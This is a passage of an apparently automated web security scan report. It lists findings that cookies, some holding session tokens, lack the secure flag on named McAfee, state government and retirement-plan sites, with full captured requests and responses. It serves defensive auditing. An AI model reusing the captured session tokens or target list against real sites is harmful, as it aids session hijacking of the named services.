Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:29 GMT
Content-Length: 37490
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

7.27. https://home.mcafee.com/secure/cart/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart/ HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; CookieInformation=locale=us; SiteID=1; SessionInfo=AffiliateId=0&CampaignId=86873; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0; AffID=0; Locale=en%2Dus; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 20:58:11 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 20:58:10 GMT
Content-Length: 36966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

7.28. https://home.mcafee.com/secure/purchase/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/purchase/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/purchase/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/purchase/; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:23 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fpurchase%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:22 GMT
Content-Length: 37412
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

7.29. https://iris.custhelp.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://iris.custhelp.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: http://www.va.gov/iris/home.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:45:59 GMT
P3P: policyref="http://iris.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU_pMUOYs07f6ikNnhs77hXknNLrnZxHB3BzmZU1_5792wAwkVsh0glXqTf4M4QBUlJjL9CQDoDbsSVeM65twoSsIsv2AlM1GTd2DiUFRgHGi%7EBwNjTS626WHfMrJjwDtsFuF320fTHD%7EL8hE5q1QnsToFNBEUVjpa; path=/; httponly
RNT-Time: D=85565 t=1304124359766778
RNT-Machine: 05
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS2744aa=09fc138b83f944b6bf4686c9c65f5bc79d428e54096116a84dbb5bc7; Max-Age=900; Path=/
Content-Length: 29357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<h
...[SNIP]...

7.30. https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://iris.custhelp.com
Path:   /app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6; TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:47:53 GMT
P3P: policyref="http://iris.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUO4heum5AKkuwxGWoE6FNq47IQuI0K3%7EesduKqMc2PH1xFkl_06%7EMc02V8p7wHXmU4qXdWo%7EG8SO8STexiMgGVeYJPP41Y2C8G73MIrQvkPCRgKYdeWQX9FFf_ns2swT2oj18%7EAxHEffu%7EZaLclJ9n3bX1LoWn1rOVPybe3voqjfzQsAWxdmmB1Qa6yeQa3CtkuzM3hLdu_M%21; path=/; httponly
RNT-Time: D=119504 t=1304124473961813
RNT-Machine: 05
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc; Max-Age=900; Path=/
Content-Length: 41356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<h
...[SNIP]...

7.31. https://iris.custhelp.com/app/home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://iris.custhelp.com
Path:   /app/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/home HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6; cp_session=aUikFgcgagxbyNc6bBtpeAQnz7CbRGl0HlRzZw2K1u6edMsf05RsqY6Jl_TQ7FD8V8UJLcPs38AKjZaz9yZMFx2WW_4hETSJaa8SWL6Gai4cTEyE37ZS91mPSrHyisikTcaqGGB7D4rm_I8eWdX2vRnCdn0jquco1jHNqXYnB9pLAHxc_Mv7Sq_J5b8jggGTmw9bepkVPoknY%21; TS8118ae=6c3373cb5cc5ffbbcc089968f4a020a385ea932776fb04994dbb5ef8

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:40 GMT
P3P: policyref="http://iris.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUeZ92xvAiog2ot2mp%7EDI%7ETV3biufKo2ghCIg8Bbbgym7%7EM4tR89%7EoZImybuJkUdn9JgJowfZXeBha7Hr2V4NLkp21KWcXOXWsuX33nYejEUbzoXpGPGzla62VARg97DltonmiiehtJ8IbDlMWX_D7czyU7dwa9mvVNhsCGNtS6GRqzjYivCnW0txXc7FeP9TqvsO0gLqXGaE%21; path=/; httponly
RNT-Time: D=88319 t=1304125180207538
RNT-Machine: 05
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS8118ae=6c3373cb5cc5ffbbcc089968f4a020a385ea932776fb04994dbb5ef8; Max-Age=900; Path=/
Content-Length: 28903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<h
...[SNIP]...

7.32. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://joblink.alabama.gov
Path:   /ada/works/WorkforceCenter.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/WorkforceCenter.cfm HTTP/1.1
Host: joblink.alabama.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:21:34 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=6545172;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d-A65B55C9-2655-1FA7-D4A367D93293FAA3;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFID=6545172;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d%2DA65B55C9%2D2655%2D1FA7%2DD4A367D93293FAA3;path=/
Set-Cookie: TEST=1;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...

7.33. https://license.ohio.gov/lookup/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://license.ohio.gov
Path:   /lookup/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lookup/default.asp HTTP/1.1
Host: license.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCASDBT=LEIBCKOBGPFJHLNMJNJCFAIA; path=/
Cache-control: private


<HTML>
<HEAD>
<link rel="stylesheet" type="text/css" href="/css/color_scheme.css">
<link rel="stylesheet" type="text/css" href="/css/main.css">
<title>License Search</title>

<SCRIPT ID=clie
...[SNIP]...

7.34. https://louisianadcpretire.gwrs.com/login.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://louisianadcpretire.gwrs.com
Path:   /login.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.do HTTP/1.1
Host: louisianadcpretire.gwrs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:11 GMT
Server: FASCore
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 10709
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=khX0N72Svxws3br!-1692232030!-1164814424; path=/
Content-Language: en-US
P3P: CP="ALL DSP COR CUR ADM DEV TAI HIS OUR OTRi BUS PHY ONL UNI FIN COM NAV INT DEM GOV"
Connection: close
Content-Type: text/html;charset=UTF-8

